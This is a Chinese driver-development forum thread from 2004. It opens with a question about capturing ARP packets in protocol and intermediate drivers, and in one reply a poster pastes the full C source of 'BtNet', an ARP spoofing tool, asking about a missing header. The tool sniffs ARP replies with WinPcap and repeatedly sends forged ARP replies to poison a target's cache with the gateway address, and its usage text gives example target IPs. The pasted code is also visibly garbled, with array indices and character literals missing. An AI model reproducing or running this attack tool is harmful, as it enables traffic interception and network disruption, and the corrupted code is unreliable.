aldsd
驱动牛犊
驱动牛犊
  • 注册日期2004-02-26
  • 最后登录2005-05-16
  • 粉丝0
  • 关注0
  • 积分0分
  • 威望0点
  • 贡献值0点
  • 好评度0点
  • 原创分0分
  • 专家分0分
阅读:1211回复:3

慎重,arp的问题。

楼主#
更多 发布于:2004-04-09 16:58
在协议驱动程序中,能捕获arp包吗?
在中间驱动程序中,能捕获arp包吗?

最新喜欢:

WY.lslrtWY.lsl...
aldsd
wywwwl
驱动大牛
驱动大牛
  • 注册日期2002-08-16
  • 最后登录2018-04-07
  • 粉丝1
  • 关注0
  • 积分-10分
  • 威望135点
  • 贡献值6点
  • 好评度76点
  • 原创分0分
  • 专家分0分
  • 社区居民
沙发#
发布于:2004-04-09 17:02
在协议驱动程序中,能捕获arp包吗?
在中间驱动程序中,能捕获arp包吗?

都能!
琢磨悟真知
aldsd
驱动牛犊
驱动牛犊
  • 注册日期2004-02-26
  • 最后登录2005-05-16
  • 粉丝0
  • 关注0
  • 积分0分
  • 威望0点
  • 贡献值0点
  • 好评度0点
  • 原创分0分
  • 专家分0分
板凳#
发布于:2004-04-09 17:06
不丢包吗?
aldsd
yangguoo
驱动小牛
驱动小牛
  • 注册日期2003-07-09
  • 最后登录2008-07-07
  • 粉丝0
  • 关注0
  • 积分10分
  • 威望1点
  • 贡献值0点
  • 好评度1点
  • 原创分0分
  • 专家分0分
地板#
发布于:2004-04-12 11:16
首先,能,然后,这是从网上找的arp欺骗的程序,编译的时候总是说少\"packet32.h\"请问高手怎么回事
#include \"packet32.h\"
#include \"ntddndis.h\"
#include <stdio.h>
#include <conio.h>
#include <winsock2.h>
#include <windows.h>

#pragma comment(lib,\"ws2_32\")
#pragma comment(lib,\"packet\")

#define ETH_IP 0x0800
#define ETH_ARP 0x0806
#define ARP_REQUEST 0x0001 //arp请求包
#define ARP_REPLY 0x0002 //arp应答包
#define ARP_HARDWARE 0x0001
#define max_num_adapter 10

#pragma pack(push,1)

typedef struct ethdr
{
unsigned char eh_dst[6]; //以太网目的地址
unsigned char eh_src[6]; //以太网源地址
unsigned short eh_type; //
}ETHDR,*PETHDR;
typedef struct arphdr //arp头
{
unsigned short arp_hdr; //硬件类型
unsigned short arp_pro; //协议类型
unsigned char arp_hln; //硬件地址长度
unsigned char arp_pln; //协议地址长度
unsigned short arp_opt; //
unsigned char arp_sha[6]; //发送端以太网地址
unsigned long arp_spa; //发送端ip地址
unsigned char arp_tha[6]; //接收端以太网地址
unsigned long arp_tpa; //接收端ip地址
}ARPHDR,*PARPHDR;

typedef struct ip_mac
{
u_long ip;
unsigned char mac[6];
}IP_MAC,*PIP_MAC;

#pragma pack(push)

LPADAPTER lpAdapter;
char adapterlist[max_num_adapter][1024];
IP_MAC toipandmac;
IP_MAC oipandmac,myipandmac;
BOOL param6=FALSE;
char *noMACstr;
char noMAC[6][3];
u_long mytoIP,oIP;
BOOL sendtoOip;
MSG msg;
UINT newtimer;
char MYIP[20]=\"128.128.128.128\";
BOOL toipandmac_flag=FALSE,myipandmac_flag=FALSE,oipandmac_flag=FALSE;

int getint(char c)
{
int t=-1;
if((c<=9)&&(c>=0))
t=c-0;
else if((c>=a)&&(c<=f))
t=10+c-a;
else if((c>=A)&&(c<=F))
t=10+c-A;
return t;
}

void start()
{
printf(\"BtNet //--an ARP Tool test the Windows Break the Internetn\");
printf(\"written by Ruder,10/2003n\");
printf(\"Homepage: http://xEyes.cdut.net/ruder/index.htm;n\");
printf(\"E-mail: cocoruder@163.comn\");
printf(\"nUsage: BtNet -h attackIP -o gateIP [-m spoofedMAC]n\");
printf(\"Example:n\");
printf(\"BtNet -h 202.115.138.12 -o 202.115.138.1n\");
printf(\"BtNet -h 202.115.138.12 -o 202.115.138.1 -m 00-50-fc-6a--6b--7cn\");
printf(\" Warning: You must have installed the winpcap_2.3 or winpcap_3.0_alphan\");
return ;
}

DWORD WINAPI sniff(LPVOID)
{
LPPACKET lppackets,lpPacketr;
char recvbuf[1024*250];
ULONG ulbytesreceived,off;
ETHDR *eth;
ARPHDR *arp;
char *buf,*pChar,*base;
char szTemp[20];
struct bpf_hdr *hdr;

if((lppackets=PacketAllocatePacket())==FALSE)
{
printf(\"PacketAllocatePacket send Error: %dn\",GetLastError());
return 0;
}

if(PacketSetHwFilter(lpAdapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE)
{
printf(\"Warning: Unable to set the adapter to promiscuous moden\");
}

if(PacketSetBuff(lpAdapter,500*1024)==FALSE)
{
printf(\"PacketSetBuff Error: %dn\",GetLastError());
return 0;
}

if(PacketSetReadTimeout(lpAdapter,1)==FALSE)
{
printf(\"Warning: Unable to set the timeoutn\");
}

if((lpPacketr=PacketAllocatePacket())==FALSE)
{
printf(\"PacketAllocatePacket receive Error: %dn\",GetLastError());
return 0;
}

PacketInitPacket(lpPacketr,(char *)recvbuf,sizeof(recvbuf));

while(!kbhit())
{
if(PacketReceivePacket(lpAdapter,lpPacketr,TRUE)==FALSE)
{
return 0;
}
//getdata(lppacketr,option);
ulbytesreceived=lpPacketr->ulBytesReceived;
buf=(char *)lpPacketr->Buffer;

off=0;
while(off<ulbytesreceived)
{
if(kbhit())
{
return 0;
}
hdr=(struct bpf_hdr *)(buf+off);
off+=hdr->bh_hdrlen;

pChar=(char *)(buf+off);
base=pChar;
off=Packet_WORDALIGN(off+hdr->bh_caplen);

eth=(PETHDR)pChar; //以太头
arp=(PARPHDR)(pChar+sizeof(ETHDR)); //arp头
int i;

if((eth->eh_type==htons(ETH_ARP))&&
(arp->arp_opt==htons(ARP_REPLY)))
{
//if (arp->arp_tpa==htonl(ntohl(inet_addr(MYIP))))
{
if(oipandmac_flag&&myipandmac_flag&&toipandmac_flag)
return 0;
if (((toipandmac.ip==htonl(arp->arp_spa))&&(toipandmac_flag==FALSE))
||((myipandmac.ip==htonl(arp->arp_spa))&&(myipandmac_flag==FALSE))
||((oipandmac.ip==htonl(arp->arp_spa))&&(oipandmac_flag==FALSE)))
{
memset(szTemp,0,sizeof(szTemp));
memcpy(szTemp,&arp->arp_spa,sizeof(arp->arp_spa));

printf(\"[IP]:\");
printf(\"%s\",inet_ntoa(*((struct in_addr *)szTemp)));
printf(\"[MAC]:\");
for(i=0;i<5;i++)
{
printf(\"%.2x-\",eth->eh_src);
}
printf(\"%.2x\",eth->eh_src[5]);
printf(\"n\");

if (toipandmac.ip==htonl(arp->arp_spa))
{
for(i=0;i<6;i++)
toipandmac.mac=eth->eh_src;
toipandmac_flag=TRUE;
}

if (oipandmac.ip==htonl(arp->arp_spa))
{
for(i=0;i<6;i++)
oipandmac.mac=eth->eh_src;
oipandmac_flag=TRUE;
// printf(\"if you have get the MAC Addresses enough,Press any key for staring!n\");
}
if(myipandmac.ip==htonl(arp->arp_spa))
{
for(i=0;i<6;i++)
myipandmac.mac=eth->eh_src;
myipandmac_flag=TRUE;
}
}
}
}
continue;
}
}
return 0;
}


DWORD WINAPI sendARPPacket(LPVOID dwsendtoIP)
{
LPPACKET lpPacket;
ETHDR eth;
ARPHDR arphdr;
int i;
char szPacketBuf[600];
u_long sendtoIP=*(u_long *)dwsendtoIP;
//struct sockaddr_in sin;

lpPacket = PacketAllocatePacket();
if(lpPacket==NULL)
{
printf(\"nPacketAllocatePacket error!\");
return 0;
}
eth.eh_type=htons(ETH_ARP);
for(i=0;i<6;i++)
{
eth.eh_dst=0xff;
eth.eh_src=0xa5;
arphdr.arp_sha=0xa5;
arphdr.arp_tha=0xff;
}

arphdr.arp_hdr=htons(ARP_HARDWARE);
arphdr.arp_pro=htons(ETH_IP);
arphdr.arp_opt=htons(ARP_REQUEST);
arphdr.arp_hln=6;
arphdr.arp_pln=4;

arphdr.arp_tpa=htonl(sendtoIP);
arphdr.arp_spa=htonl(ntohl(inet_addr(MYIP)));
if(sendtoOip)
{


if(myipandmac_flag)
{
for(i=0;i<6;i++)
{
eth.eh_src=myipandmac.mac;
arphdr.arp_sha=myipandmac.mac;
arphdr.arp_spa=htonl(myipandmac.ip);
//memset(MYIP,0,sizeof(MYIP));

}
}
else
{
printf(\"My MAC Address Cant Find!n\");
return 0;
}
}

memset(szPacketBuf,0,sizeof(szPacketBuf));
memcpy(szPacketBuf,e,sizeof(ETHDR));
memcpy(szPacketBuf+sizeof(ETHDR),&arphdr,sizeof(ARPHDR));

PacketInitPacket(lpPacket,szPacketBuf,60);
if(PacketSetNumWrites(lpAdapter, 1)==FALSE)
{
printf(\"warning: Unable to send more than one packet in a single write!n\");
}

if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)
{
printf(\"Error sending the packets!n\");
PacketFreePacket(lpPacket);
return 0;
}

PacketFreePacket(lpPacket);

return 0;
}


DWORD WINAPI sendSR()
{
ETHDR eth;
ARPHDR arphdr;
int i;
char szPacketBuf[600];
LPPACKET lpPacket;
unsigned char toMAC[6];
struct sockaddr_in sin;
u_long toIP=mytoIP;

//if ((myipandmac_flag==FALSE)||(oipandmac_flag==FALSE)||(toipandmac_flag==FALSE))
//{
// printf(\"Cant get all MAC address!n\");
// return 0;
//}
lpPacket = PacketAllocatePacket();
if(lpPacket == NULL)
{
printf(\"nError:failed to allocate the LPPACKET structure.n\");
return 0;
}
if (toipandmac_flag==FALSE)
{
printf(\"Cant get toMAC address!n\");
return 0;
}

memset(toMAC,0,sizeof(toMAC));
memcpy(toMAC,&toipandmac.mac,sizeof(toipandmac.mac));

if (param6)
{
for(i=0;i<6;i++)
{
int t1,t2;
char c1,c2;
c1=noMAC[0];
c2=noMAC[1];

t1=getint(c1);
t2=getint(c2);

if((t1==-1)||(t2==-1))
{
printf(\"-m parameter error!n\");
return 0;
}

eth.eh_src=t1*16+t2;
eth.eh_dst=toMAC;
arphdr.arp_sha=t1*16+t2;
arphdr.arp_tha=toMAC;
}
}
else
{
for(i=0;i<6;i++)
{
eth.eh_src=toMAC;
eth.eh_dst=toMAC;
arphdr.arp_sha=toMAC;
arphdr.arp_tha=toMAC;
}
}

eth.eh_type=htons(ETH_ARP);

arphdr.arp_spa=htonl(oIP);
arphdr.arp_tpa=htonl(toIP);

arphdr.arp_hdr=htons(ARP_HARDWARE);
arphdr.arp_pro=htons(ETH_IP);
arphdr.arp_opt=htons(ARP_REPLY);
arphdr.arp_hln=6;
arphdr.arp_pln=4;

memset(szPacketBuf,0,sizeof(szPacketBuf));
memcpy(szPacketBuf,e,sizeof(ETHDR));
memcpy(szPacketBuf+sizeof(ETHDR),&arphdr,sizeof(ARPHDR));

PacketInitPacket(lpPacket,szPacketBuf,60);
if(PacketSetNumWrites(lpAdapter, 1)==FALSE)
{
printf(\"warning: Unable to send more than one packet in a single write!n\");
}
if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE)
{
printf(\"Error sending the packets!n\");
PacketFreePacket(lpPacket);
return 0;
}
PacketFreePacket(lpPacket);

sin.sin_addr.s_addr=arphdr.arp_tpa;

printf(\"spoof %s: \",inet_ntoa(sin.sin_addr));
sin.sin_addr.s_addr=arphdr.arp_spa;
printf(\"%s-->\",inet_ntoa(sin.sin_addr));

for(i=0;i<5;i++)
printf(\"%.2x-\",arphdr.arp_sha);
printf(\"%x\",arphdr.arp_sha[5]);
printf(\"n\");

return 0;
}


DWORD WINAPI sendSRTimer(LPVOID dwtoIP)
{
printf(\"Waiting spoof Startn\");
mytoIP=*(u_long *)dwtoIP;
newtimer=SetTimer(NULL,NULL,5*1000,TIMERPROC(sendSR));

while(GetMessage(&msg,0,0,0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return 0;
}

int main(int argc,char *argv[])
{
HANDLE thread1,thread2,thread3;
WCHAR adaptername[8192];
WCHAR *name1,*name2;
ULONG adapterlength;
DWORD threadid1,threadid2,threadid3;
u_long toIP,myip;
struct NetType ntype;
struct sockaddr_in sin;
struct npf_if_addr ipbuff;
int adapternum=0,opti=0,open,i,j;
long npflen;

if((argc!=5)&&(argc!=7))
{
start();
return 0;
}
else if((strcmp(argv[1],\"-h\")!=0)||(strcmp(argv[3],\"-o\")!=0))
{
start();
return 0;
}

toIP=ntohl(inet_addr(argv[2]));
oIP=ntohl(inet_addr(argv[4]));

if (argv[5]!=NULL)
{
if (strcmp(argv[5],\"-m\")==0)
{
noMACstr=argv[6];
j=0;

for(i=0;i<6;i++)
{
memset(noMAC,0,sizeof(noMAC));
memcpy(noMAC,noMACstr,2);
noMACstr=noMACstr+3;
}
param6=TRUE;
}
}
printf(\"nLibarary Version: %s\",PacketGetVersion());
adapterlength=sizeof(adaptername);

if(PacketGetAdapterNames((char *)adaptername,&adapterlength)==FALSE) //得到网卡列表
{
printf(\"PacketGetAdapterNames Error: %dn\",GetLastError());
return -1;
}

name1=adaptername;
name2=adaptername;
i=0;

while((*name1!=) || (*(name1-1)!=))
{
if(*name1==)
{
memcpy(adapterlist,name2,2*(name1-name2));
name2=name1+1;
i++;
}
name1++;
}

adapternum=i;
printf(\"nAdapters Installed:n\");
for(i=0;i<adapternum;i++)
wprintf(L\"%d - %sn\",i+1,adapterlist);

do
{
printf(\"nSelect the number of the adapter to open: \");
scanf(\"%d\",&open);
if(open>=1 && open<=adapternum)
break;
}while(open<1 || open>adapternum);

lpAdapter=PacketOpenAdapter(adapterlist[open-1]);

if(!lpAdapter || (lpAdapter->hFile==INVALID_HANDLE_VALUE))
{
printf(\"PacketOpenAdapter Error: %dn\",GetLastError());
return -1;
}

if(PacketGetNetType(lpAdapter,&ntype))
{
printf(\"ntt*** Host Information ***n\");
printf(\"[LinkTpye:]t%dtt\",ntype.LinkType);
printf(\"[LinkSpeed:]t%d b/sn\",ntype.LinkSpeed);
}

npflen=sizeof(ipbuff);
if(PacketGetNetInfoEx(adapterlist[open-1],&ipbuff,&npflen))
{
sin=*(struct sockaddr_in *)&(ipbuff.Broadcast);
printf(\"[Broadcast:]t%.16st\",inet_ntoa(sin.sin_addr));

sin=*(struct sockaddr_in *)&(ipbuff.SubnetMask);
printf(\"[SubnetMask:]t%.16sn\",inet_ntoa(sin.sin_addr));

sin=*(struct sockaddr_in *)&(ipbuff.IPAddress);
printf(\"[IPAddress:]t%.16st\",inet_ntoa(sin.sin_addr));
myip=ntohl(sin.sin_addr.s_addr);

printf(\"[MACAddress:]\");
}
else
{
printf(\"nNot get enough datan\");
//PacketFreePacket(lppackets);
PacketCloseAdapter(lpAdapter);
return -1;
}
printf(\"n\");

oipandmac.ip=oIP;
toipandmac.ip=toIP;
myipandmac.ip=myip;
sendtoOip=FALSE;

thread1=CreateThread(NULL,0,sniff,NULL,0,&threadid1);
Sleep(300);
thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&myip,0,&threadid2);
Sleep(100);
CloseHandle(thread2);
thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&toIP,0,&threadid2);
Sleep(10);
CloseHandle(thread2);
sendtoOip=TRUE;
Sleep(200);
thread2=CreateThread(NULL,0,sendARPPacket,(LPVOID)&oIP,0,&threadid2);
Sleep(10);
CloseHandle(thread2);
// WaitForSingleObject(thread1,INFINITE);
thread3=CreateThread(NULL,0,sendSRTimer,(LPVOID)&toIP,0,&threadid3);
WaitForSingleObject(thread3,INFINITE);

PacketCloseAdapter(lpAdapter);

return 0;
}

[img]http://www.driverdevelop.com/forum/upload/Xman/2004-04-05_2004324183110706.jpg[/img][size=3]跟我比灌水,年[/size]
游客

返回顶部